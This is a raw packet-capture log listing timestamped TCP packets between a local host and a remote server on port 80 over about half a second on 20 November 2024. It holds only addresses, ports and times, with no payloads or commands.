                                                                                                                                                                                            Nov 20, 2024 21:04:29.505817890 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                            Nov 20, 2024 21:04:29.506448984 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:29.506669044 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:29.506716013 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                            Nov 20, 2024 21:04:29.507447004 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:29.507705927 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:29.507762909 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                            Nov 20, 2024 21:04:29.508359909 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:29.508599997 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:29.508645058 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                            Nov 20, 2024 21:04:29.509344101 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:29.509592056 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:29.509640932 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                            Nov 20, 2024 21:04:29.510287046 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:29.510370016 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:29.510420084 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                            Nov 20, 2024 21:04:29.511185884 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:29.511198044 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:29.511245966 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                            Nov 20, 2024 21:04:29.512065887 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:29.512268066 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:29.512312889 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                            Nov 20, 2024 21:04:29.513035059 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:29.513191938 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:29.513237953 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                            Nov 20, 2024 21:04:29.513946056 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:29.514312983 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:29.514355898 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                            Nov 20, 2024 21:04:29.514867067 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:29.515060902 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:29.515110970 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                            Nov 20, 2024 21:04:29.515796900 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:29.515875101 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:29.515923977 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                            Nov 20, 2024 21:04:29.516735077 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:29.516855001 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:29.516897917 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                            Nov 20, 2024 21:04:29.517726898 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:29.517802000 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:29.517847061 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                            Nov 20, 2024 21:04:29.518613100 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:29.518754959 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:29.518820047 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                            Nov 20, 2024 21:04:29.519534111 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:29.519649029 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:29.519691944 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                            Nov 20, 2024 21:04:29.520467043 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:29.520567894 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:29.520612001 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                            Nov 20, 2024 21:04:29.521405935 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:29.521783113 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:29.521828890 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                            Nov 20, 2024 21:04:29.522310019 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:29.522427082 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:29.522469997 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                            Nov 20, 2024 21:04:29.523109913 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                            Nov 20, 2024 21:04:29.523233891 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:29.523458958 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:29.523504972 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                            Nov 20, 2024 21:04:29.524168015 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:29.524271965 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:29.524316072 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                            Nov 20, 2024 21:04:29.525120974 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:29.525213957 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:29.525258064 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                            Nov 20, 2024 21:04:29.526062012 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:29.526108027 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:29.526151896 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                            Nov 20, 2024 21:04:29.526983976 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:29.527079105 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:29.527123928 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                            Nov 20, 2024 21:04:29.527913094 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:29.528006077 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:29.528052092 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                            Nov 20, 2024 21:04:29.528842926 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:29.528954983 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:29.529006004 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                            Nov 20, 2024 21:04:29.529763937 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:29.529860020 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:29.529902935 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                            Nov 20, 2024 21:04:29.530730009 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:29.530822992 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:29.530865908 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                            Nov 20, 2024 21:04:29.531678915 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:29.531713009 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:29.531840086 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                            Nov 20, 2024 21:04:29.532579899 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:29.532799006 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:29.532840967 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                            Nov 20, 2024 21:04:29.533514977 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:29.533725977 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:29.533776999 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                            Nov 20, 2024 21:04:29.534394979 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:29.566288948 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                            Nov 20, 2024 21:04:29.686775923 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:29.686830997 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:29.686882019 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                            Nov 20, 2024 21:04:29.687139034 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:29.687213898 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:29.687261105 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                            Nov 20, 2024 21:04:29.688079119 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:29.688195944 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:29.688255072 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                            Nov 20, 2024 21:04:29.689008951 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:29.689161062 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:29.689204931 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                            Nov 20, 2024 21:04:29.690135956 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:29.690243959 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:29.690296888 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                            Nov 20, 2024 21:04:29.691009045 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:29.691118002 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:29.691199064 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                            Nov 20, 2024 21:04:29.691822052 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:29.692012072 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:29.692061901 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                            Nov 20, 2024 21:04:29.692738056 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:29.692791939 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:29.692841053 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                            Nov 20, 2024 21:04:29.693696022 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:29.693933010 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:29.693984032 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                            Nov 20, 2024 21:04:29.694603920 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:29.694741964 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:29.694787025 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                            Nov 20, 2024 21:04:29.695559025 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:29.695666075 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:29.695713043 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                            Nov 20, 2024 21:04:29.696640015 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:29.696935892 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:29.696990013 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                            Nov 20, 2024 21:04:29.697549105 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:29.697576046 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:29.697633982 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                            Nov 20, 2024 21:04:29.698339939 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:29.698391914 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:29.698441982 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                            Nov 20, 2024 21:04:29.699268103 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:29.699511051 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:29.699561119 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                            Nov 20, 2024 21:04:29.700227976 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:29.700328112 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:29.700377941 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                            Nov 20, 2024 21:04:29.701133966 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:29.701225996 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:29.701280117 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                            Nov 20, 2024 21:04:29.702092886 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:29.702239037 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:29.702291965 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                            Nov 20, 2024 21:04:29.703008890 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:29.703067064 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:29.703113079 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                            Nov 20, 2024 21:04:29.703952074 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:29.704050064 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:29.704103947 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                            Nov 20, 2024 21:04:29.704741955 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                            Nov 20, 2024 21:04:29.704879999 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:29.704967976 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:29.705013037 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                            Nov 20, 2024 21:04:29.705935955 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:29.705974102 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:29.706022978 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                            Nov 20, 2024 21:04:29.706757069 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:29.706916094 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:29.706965923 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                            Nov 20, 2024 21:04:29.707743883 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:29.707797050 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:29.707845926 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                            Nov 20, 2024 21:04:29.708595991 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:29.708955050 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:29.709012985 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                            Nov 20, 2024 21:04:29.709527969 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:29.709661007 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:29.709717989 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                            Nov 20, 2024 21:04:29.710469007 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:29.710591078 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:29.710648060 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                            Nov 20, 2024 21:04:29.711430073 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:29.711575985 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:29.711626053 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                            Nov 20, 2024 21:04:29.712384939 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:29.712498903 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:29.712546110 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                            Nov 20, 2024 21:04:29.713283062 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:29.713421106 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:29.713471889 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                            Nov 20, 2024 21:04:29.714322090 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:29.714471102 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:29.714673042 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                            Nov 20, 2024 21:04:29.715210915 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:29.715291977 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:29.715341091 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                            Nov 20, 2024 21:04:29.716104031 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:29.716192007 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:29.716248989 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                            Nov 20, 2024 21:04:29.716993093 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:29.717113972 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                            Nov 20, 2024 21:04:29.717137098 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:29.717195034 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                            Nov 20, 2024 21:04:29.717946053 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:29.718056917 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:29.718105078 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                            Nov 20, 2024 21:04:29.718878984 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:29.719048023 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:29.719814062 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:29.720151901 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:29.720768929 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:29.720830917 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:29.721127033 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                            Nov 20, 2024 21:04:29.721159935 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                            Nov 20, 2024 21:04:29.721698046 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:29.721792936 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:29.721837997 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                            Nov 20, 2024 21:04:29.722592115 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:29.722726107 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:29.722774982 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                            Nov 20, 2024 21:04:29.723539114 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:29.723661900 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:29.723710060 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                            Nov 20, 2024 21:04:29.724473000 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:29.724569082 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:29.724618912 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                            Nov 20, 2024 21:04:29.725429058 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:29.725481033 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:29.725529909 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                            Nov 20, 2024 21:04:29.726357937 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:29.726479053 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:29.726532936 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                            Nov 20, 2024 21:04:29.727300882 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:29.727401018 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:29.727488995 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                            Nov 20, 2024 21:04:29.728235960 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:29.728315115 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:29.728363991 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                            Nov 20, 2024 21:04:29.729298115 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:29.729348898 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:29.729403973 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                            Nov 20, 2024 21:04:29.730106115 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:29.730290890 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:29.730350018 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                            Nov 20, 2024 21:04:29.730990887 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:29.731151104 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:29.731231928 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                            Nov 20, 2024 21:04:29.731980085 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:29.732068062 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:29.732139111 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                            Nov 20, 2024 21:04:29.732903957 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:29.732980013 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:29.733028889 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                            Nov 20, 2024 21:04:29.733839989 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:29.734103918 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:29.734153986 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                            Nov 20, 2024 21:04:29.734821081 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:29.734916925 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:29.735594034 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:29.735642910 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                            Nov 20, 2024 21:04:29.779869080 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                            Nov 20, 2024 21:04:29.888139963 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:29.888195992 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:29.888272047 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                            Nov 20, 2024 21:04:29.888458014 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:29.888621092 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:29.888676882 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                            Nov 20, 2024 21:04:29.889483929 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:29.889523029 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:29.889576912 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                            Nov 20, 2024 21:04:29.890376091 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:29.890506029 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:29.890703917 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                            Nov 20, 2024 21:04:29.891278028 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:29.891395092 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:29.891450882 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                            Nov 20, 2024 21:04:29.892250061 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:29.892384052 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:29.892436981 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                            Nov 20, 2024 21:04:29.893177986 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:29.893238068 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:29.893281937 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                            Nov 20, 2024 21:04:29.894083023 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:29.894278049 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:29.894325972 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                            Nov 20, 2024 21:04:29.895013094 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:29.895153999 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:29.895206928 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                            Nov 20, 2024 21:04:29.895968914 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:29.896075010 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                            Nov 20, 2024 21:04:29.896078110 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:29.896872997 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:29.896927118 CET4974480192.168.2.4185.215.113.16
